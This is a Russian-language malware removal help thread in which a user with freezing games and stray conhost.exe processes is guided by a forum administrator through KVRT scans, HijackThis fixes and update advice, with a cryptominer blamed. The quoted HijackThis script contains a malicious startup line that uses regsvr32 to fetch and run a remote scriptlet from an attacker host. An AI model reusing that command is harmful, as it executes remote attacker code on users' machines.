• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена conhost.exe todo

Статус
В этой теме нельзя размещать новые ответы.

whysohard

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
Здравствуйте. Обнаружил сегодня сего гостя на своем ПК. Но я подозреваю, что он уже не первый день тут. Подозрения появились где-то с неделю назад, потому что компьютер стал странно себя вести. Я решил поиграть в GTA Online, спустя какое-то время у меня стало крашить, сначала черный экран, потом белый и идет звук игры. Я погуглил, говорят "настройки высокие очень, комп не тянет", хотя 16гб оперативки, 2.5гб запас видеопамяти. Поставил на средние. Стало лучше, но теперь (через более длительный промежуток времени) у меня намертво зависает комп. Звук есть, но картинка просто встала. Ни пуск, ни альттаб, ни ctrl+alt+del не реагирует. Остается только ребутать. Я решил изучить процессы в диспетчере, я знаю довольно точно чего и сколько там должно быть и лишних приметил сразу. Вот эти конхосты меня и напрягли.

Касательно предпосылок, 10 числа увидел ярлык Opera Stable на рабочем столе (хотя я сам его там не храню, но опера установлена как запасной вариант впн). Удалил. И поскольку я вижу рабочий стол только при включении компьютера - успешно забыл. А сейчас посмотрел - он опять там. Опера работает как обычно (как мне кажется). Но я удалил ее на всякий случай.
И еще один момент, в хроме пользуюсь ВПН frigate. Так вот примерно неделю назад, а может и 10 числа появился такой момент: перестал работать в вк и на ютубе (работает в фоновом режиме на открытые сайты, нужные закрытые записаны в папку). И случилось так, что на ютубе перестали загружаться видео, а в вк отправляются сообщения по 1. Чтоб отправить еще одно, надо обновить страницу. (была ситуация такая раньше, довольно давно, но тогда через пару дней починили, а сейчас вот до сих пор так).
Не знаю, относится ли это к делу, но лучше дать всю информацию сразу, чем промолчать и навредить.

Прикрепляю логи ниже.
 

whysohard

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
Прикрепляю двое логов, но тут случилось странное. Первый лог - в эту сессию я закрыл на автомате conhost.exe todo и удалил оперу, потом сделал лог. Осознав, что процесса нужного запущенного у меня нет, я перезапустил компьютер, дабы сделать новый лог, но этого процесса в диспетчере больше нет. Остался обычной конхост, ссылающийся на sys32. Но на всякий случай прошу посмотреть логи, вдруг там что осталось.

p.s. в планировщике заданий по прежнему числятся Mysa1,2,3
 

Вложения

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
Отлично, а теперь нужен свежий пакет логов автологера, дочистим.
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
Проверьте на VirusTotal файл
C:\Windows\system32\vsjitdebugger.exe

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/08/20)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ MEGA (Pending):  MEGA (Pending) - {056D528D-CE28-4194-9BA3-BA2E9197FF8C} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ MEGA (Synced):  MEGA (Synced) - {05B38830-F4E9-4329-978B-1DD28605D202} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ MEGA (Syncing):  MEGA (Syncing) - {0596C850-7BDD-4C9D-AFDF-873BE6890637} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
Что с проблемой?
 

whysohard

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
Проверьте на VirusTotal файл
C:\Windows\system32\vsjitdebugger.exe
по указанному пути не вижу такого файла, есть такой в sysWOW64. Его проверил

По второму пункту сейчас отчитаюсь
Второй пункт сделал, по завершению открылись библиотеки.
в них что-то должно быть?
 
Последнее редактирование:

whysohard

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
По поводу проблемы: процесса я не вижу больше, что сразу после перезагрузки, что через какой-то промежуток.
Mysa из планировщика пропали. Относительно крашей ГТА не могу сказать, еще не пробовал. Сегодня попробую и отчитаюсь. (Или этот вирус не имеет отношения к крашам?)
Если вдруг проблема крашей сохранится, то это дело в этом вирусе, или с гта\компом?
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
Майнер мог вызывать зависания т.к. ел ресурсы системы.

Подготовьте лог SecurityCheck by glax24
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
исправьте по возможности
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4484071 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4512506 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft Office Enterprise 2007 v.12.0.6425.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Foxit Reader v.7.1.5.425 Внимание! Скачать обновления
^Локализованные версии могут обновляться позже англоязычных!^
TeamViewer 14 v.14.0.12356 Внимание! Скачать обновления
-------------------------------- [ Arch ] ---------------------------------
WinRAR 5.20 (64-разрядная) v.5.20.0 Внимание! Скачать обновления
--------------------------------- [ IM ] ----------------------------------
Telegram Desktop, версия 1.3.7 v.1.3.7 Внимание! Скачать обновления
^Необязательное обновление.^
Skype, версия 8.50 v.8.50 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Opera Stable 54.0.2952.71 v.54.0.2952.71 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
---------------------------- [ UnwantedApps ] -----------------------------
Игровой центр v.4.1486 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Max Payne v1.5 [Rus] Tycoon [RePack by MadCat] Внимание! Утилита активации, кряк или кейген.
Need For Speed Underground 2 - Repack by R.G. Revenants v.1.2 Внимание! Утилита активации, кряк или кейген.
Wise Registry Cleaner 10.13 v.10.13 Внимание! Подозрение на демо-версию антишпионской программы, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.

По последнему блоку, если не используете, то деинсталлируйте
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,523
Баллы
2,203
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу